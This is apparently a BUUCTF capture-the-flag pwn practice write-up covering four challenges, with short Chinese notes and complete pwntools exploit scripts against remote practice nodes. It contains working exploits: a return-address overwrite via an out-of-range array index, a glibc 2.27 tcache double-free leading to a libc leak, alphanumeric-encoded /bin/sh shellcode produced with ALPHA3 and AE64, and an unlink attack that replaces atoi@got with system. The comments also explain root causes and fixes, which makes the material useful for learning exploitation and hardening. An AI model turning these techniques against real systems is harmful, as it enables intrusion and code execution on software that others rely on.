PWN-PRACTICE-BUUCTF-25
- wustctf2020_name_your_cat
- ciscn_2019_final_2
- mrctf2020_shellcode_revenge
- zctf2016_note2
wustctf2020_name_your_cat
通过数组越界覆写返回地址为后门shell的地址
from pwn import *
# Exploit sketch for wustctf2020_name_your_cat (BUUCTF practice node).
# Root cause, per the write-up: the "Name for which?" slot index is used without a
# bounds check, so an index past the array (7 here) turns the name write into a
# write over the saved return address.  Defender-side fix: validate the index
# against the array length before indexing; PIE would additionally remove the
# constant backdoor address used below.
#io=process('./wustctf2020_name_your_cat')
io=remote('node4.buuoj.cn',28864)
elf=ELF('./wustctf2020_name_your_cat')   # loaded but not used further down
# Backdoor shell address.  It can only be a constant if the binary is loaded at a
# fixed base (no PIE) -- inferred from the 0x0804xxxx value, not shown here.
shell=0x080485CB
# Slots 1-4 are filled with throwaway input; only the last, out-of-range index matters.
io.sendlineafter('Name for which?\n>','1')
io.sendlineafter('Give your name plz: ','a')
io.sendlineafter('Name for which?\n>','2')
io.sendlineafter('Give your name plz: ','a')
io.sendlineafter('Name for which?\n>','3')
io.sendlineafter('Give your name plz: ','a')
io.sendlineafter('Name for which?\n>','4')
io.sendlineafter('Give your name plz: ','a')
# Index 7 is outside the intended array (the write-up's 数组越界), so the 4-byte
# value stored for this "name" lands on the return address.
io.sendlineafter('Name for which?\n>','7')
io.sendlineafter('Give your name plz: ',p32(shell))
io.interactive()
ciscn_2019_final_2
参考:ciscn_2019_final_2
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./ciscn_final_2")
# Exploit sketch for ciscn_2019_final_2 against glibc 2.27 (from the libc file name).
# The primitive is a double free of tcache-sized chunks, which the 2.27 tcache does
# not detect (the tcache "key" double-free check only arrived in glibc 2.29).  The
# write-up's own comment below notes that a later add() resets the program's
# "in use" flag without handing out a fresh chunk, which is what lets the stale
# pointer be freed again.  Defender-side fix: null the stored pointer on free and
# never let another operation re-arm a flag for a pointer that was already freed.
io=remote("node4.buuoj.cn",29994)
elf=ELF("./ciscn_final_2")
libc=ELF("./libc-2.27-18-x64.so")

def add(num_type,num):
    """Menu option 1: store ``num`` in the slot for ``num_type`` (1 = int, 2 = short int)."""
    io.sendlineafter("which command?\n> ","1")
    io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))
    io.sendlineafter("your inode number:",str(num))

def free(num_type):
    """Menu option 2: free the slot for ``num_type``."""
    io.sendlineafter("which command?\n> ","2")
    io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))

def show(num_type):
    """Menu option 3: print the slot for ``num_type`` and return the printed value as an int.

    When the slot has already been freed the printed value is heap metadata
    (a tcache fd pointer or an arena pointer), which is how the leaks below work.
    """
    io.sendlineafter("which command?\n> ","3")
    io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))
    if num_type==1:
        io.recvuntil("your int type inode number :")
    elif num_type==2:
        io.recvuntil("your short type inode number :")
    return int(io.recvuntil("\n")[:-1])

def exit():
    """Menu option 4: quit and return everything the program prints afterwards.

    NOTE: this shadows the builtin ``exit`` for the rest of the script.
    """
    io.sendlineafter("which command?\n> ","4")
    return io.recvall()

#gdb.attach(io)
#pause()
add(1,0x30)#0
#pause()
free(1) #0 out
#pause()
add(2,0x20)#1
add(2,0x20)#2
add(2,0x20)#3
add(2,0x20)#4
#pause()
free(2) #4 out
#pause()
add(1,0x30)#0, the free(2) above cleared the in-use flag; one more add() sets it back to 1 so the slot can be freed again (double free)
#pause()
free(2) #4 out, double free
#pause()
addr_chunk0_prev_size=show(2)-0xa0 #show(2) leaks chunk4's fd, which sits at a fixed 0xa0 offset from chunk0's prev_size
print("addr_chunk0_prev_size=="+hex(addr_chunk0_prev_size))
add(2,addr_chunk0_prev_size)
#pause()
add(2,addr_chunk0_prev_size)
#pause()
add(2,0x91) #set chunk0's prev_size and size fields both to 0x91
#pause()
for i in range(0,7): #get past the tcache: seven frees fill its bin for this size
    free(1)
    add(2,0x20)
free(1) #this free now goes to the unsorted bin
#pause()
main_arena=show(1)-96 #show(1) leaks main_arena+96
print("main_arena=="+hex(main_arena))
libc_base=main_arena-0x10-libc.sym["__malloc_hook"]#main_arena is at a fixed 0x10 past __malloc_hook
print("libc_base=="+hex(libc_base))
stdin_fileno=libc_base+libc.sym["_IO_2_1_stdin_"]+0x70#+0x70 is the field's fixed offset inside the struct
print("stdin_fileno=="+hex(stdin_fileno))
#pause()
add(1,stdin_fileno)
#when free(1) ran above the size was 0x91 and that chunk ended up in the unsorted bin
#this add() only malloc()s 0x20, so it is carved out of the 0x91 chunk
#pause()
add(1,0x30)
#pause()
free(1)
#pause()
add(2,0x20)
#pause()
free(1) #double free
#pause()
addr_chunk0_fd=show(1)-0x30 # chunk0's fd
#pause()
add(1,addr_chunk0_fd)
#pause()
add(1,addr_chunk0_fd)
#pause()
add(1,111)
#pause()
add(1,666) #overwrite the value at stdin_fileno with 666
#pause()
print(exit())
io.interactive()
mrctf2020_shellcode_revenge
程序对输入字符ascii码的范围进行判断,大小写+数字
然后有条call rax,可以想到是可见字符shellcode
.text:0000000000001246 lea rax, [rbp+buf]
.text:000000000000124D call rax
参考:纯字符shellcode生成指南
alpha3方法:
用重定向方法输出的shellcode文件不太成功,提取数据自行创建一个二进制文件可行
vim shellcode.py
##################################################################################################################
from pwn import *
# Dump pwntools' /bin/sh shellcode as space-separated lowercase hex bytes so the
# bytes can be entered into a hex editor by hand (the write-up creates the
# "shellcode" file that way because redirecting the raw bytes did not work).
context.arch = "amd64"
shellcode = asm(shellcraft.sh())
print(shellcode)
# Two hex digits per byte, each followed by a space (the trailing space is kept).
shellcode_bin = "".join("{:02x} ".format(byte) for byte in shellcode)
print(shellcode_bin)
##################################################################################################################
python3 shellcode.py
运行完shellcode.py的结果
然后用winhex创建一个空文件,将上面得到的十六进制填充入该空文件,保存名为shellcode
后面就是参考博客里的做法
python2 ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"
#打印出:
#Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
vim shellcode_exp.py
##################################################################################################################
# -*- coding:utf-8 -*-
from pwn import *
context.arch="amd64"
# Exploit sketch for mrctf2020_shellcode_revenge (BUUCTF practice node).
# The program filters the input to letters and digits and then `call rax`s into the
# buffer (see the disassembly above), so the defect is executing user-supplied
# bytes at all; a character whitelist is not a mitigation.  Defender-side fix: keep
# the buffer non-executable (NX / W^X) and do not dispatch into user data.
io=remote("node4.buuoj.cn",25235)
# ALPHA3 output from the previous step: the same /bin/sh shellcode re-encoded so that
# every byte passes the program's character check; the decoder is keyed on rax,
# the register the program dispatches through.
shellcode="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
io.recvuntil("Show me your magic!\n")
io.send(shellcode)#must be send(), not sendline(): presumably the appended newline would not pass the character check
io.interactive()
##################################################################################################################
python3 shellcode_exp.py
AE64方法:
from pwn import *
# Same target as above, using the AE64 encoder instead of ALPHA3.
from ae64 import AE64
context.log_level = 'debug'
context.arch = 'amd64'
#io = process('./example1')
io=remote('node4.buuoj.cn',25235)
obj = AE64()
# Encode the /bin/sh shellcode into the program's allowed alphabet; 'rax' is the
# register that holds the buffer address when the program calls into it.
sc = obj.encode(asm(shellcraft.sh()),'rax')
io.recvuntil("Show me your magic!\n")
#io.sendline(sc)
io.send(sc) # must send, not sendline
io.interactive()
zctf2016_note2
unlink
参考1:2016 ZCTF note2 题解
参考2:zctf2016_note2
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./note2")
# Exploit sketch for zctf2016_note2 against glibc 2.23 (from the libc file name).
# The primitive is the classic unlink attack: a forged chunk whose fd/bk point at
# ptr-0x18 / ptr-0x10 (ptr = the program's note-pointer table) satisfies 2.23's
# FD->bk == P / BK->fd == P check, so free() ends up writing ptr-0x18 into ptr.
# Reaching that forged chunk relies on a note write spilling into the neighbouring
# chunk's header (the add(0x00, payload) step, per the write-up).  Defender-side
# fix: bound the content write by the allocated length (a 0-length note must not
# accept 0x20 bytes); PIE would also make ptr non-constant and break the chain.
io=remote("node4.buuoj.cn",29630)
elf=ELF("./note2")
libc=ELF("./libc-2.23-16-x64.so")

def add(note_len,content):
    """Menu option 1: create a note of ``note_len`` bytes holding ``content``."""
    io.sendlineafter("option--->>\n","1")
    io.sendlineafter("Input the length of the note content:(less than 128)\n",str(note_len))
    io.sendlineafter("Input the note content:\n",content)

def show(index):
    """Menu option 2: print note ``index`` (the caller reads the output)."""
    io.sendlineafter("option--->>\n","2")
    io.sendlineafter("Input the id of the note:\n",str(index))

def edit(index,choice,content):
    """Menu option 3: rewrite note ``index``; ``choice`` 1 = overwrite, 2 = append."""
    io.sendlineafter("option--->>\n","3")
    io.sendlineafter("Input the id of the note:\n",str(index))
    io.sendlineafter("do you want to overwrite or append?[1.overwrite/2.append]\n",str(choice))
    io.sendlineafter("TheNewContents:",content)

def free(index):
    """Menu option 4: delete note ``index``."""
    io.sendlineafter("option--->>\n","4")
    io.sendlineafter("Input the id of the note:\n",str(index))

def exit():
    """Menu option 5: quit.  NOTE: shadows the builtin ``exit``."""
    io.sendlineafter("option--->>\n","5")

# Address of the note-pointer table in the binary; constant only because the
# binary is not position independent (inferred from the 0x60xxxx value).
ptr=0x0000000000602120
fd=ptr-0x18
bk=ptr-0x10
io.sendlineafter("Input your name:\n","P1umH0")
io.sendlineafter("Input your address:\n","P1umH0")
#gdb.attach(io)
#pause()
# Note 0 holds the forged chunk: prev_size 0, size 0x80+0x21, fd/bk aimed at ptr.
add(0x80,p64(0)+p64(0x80+0x21)+p64(fd)+p64(bk))#0
add(0x00,"aaaa")#1
add(0x80,"bbbb")#2
#pause()
free(1)
#pause()
# Written through the re-used 0-length slot; reaches note 2's prev_size/size header.
payload="a"*0x10+p64(0xa0)+p64(0x90)
add(0x00,payload)#3
#pause()
free(2) #unlink *ptr=ptr-0x18
#pause()
# Note 0's pointer now resolves to ptr-0x18, so overwriting 0x18 bytes past it
# replaces the note-0 entry itself with the GOT slot of atoi.
payload="a"*0x18+p64(elf.got["atoi"])
edit(0,1,payload)
#pause()
show(0)   # prints what note 0 points at, i.e. the resolved atoi address
io.recvuntil("Content is ")
atoi_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]
edit(0,1,p64(system))   # writes system over atoi@got
#pause()
# The menu presumably parses the option with atoi, so this string reaches system().
io.sendlineafter("option--->>\n","/bin/sh\x00")
io.interactive()